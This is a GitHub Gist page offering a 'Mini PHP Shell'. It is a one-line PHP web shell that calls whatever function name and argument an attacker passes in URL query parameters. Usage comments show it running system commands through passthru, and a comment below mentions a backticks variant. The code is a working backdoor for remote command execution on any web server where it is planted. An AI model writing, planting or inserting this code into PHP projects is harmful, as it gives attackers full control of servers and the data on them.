Created
December 28, 2011 03:19
-
-
Save btoews/1526009 to your computer and use it in GitHub Desktop.
Mini PHP Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//(c) mastahyeti | |
//mini php shell | |
//usage: http://example.com?1=function_name&2=function_arguments | |
//example: http://example.com?1=passthru&2=ls | |
<? $_GET[1]($_GET[2]) ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
okay, THOMAS STIG JACOBSEN has me beat... didn't think about backticks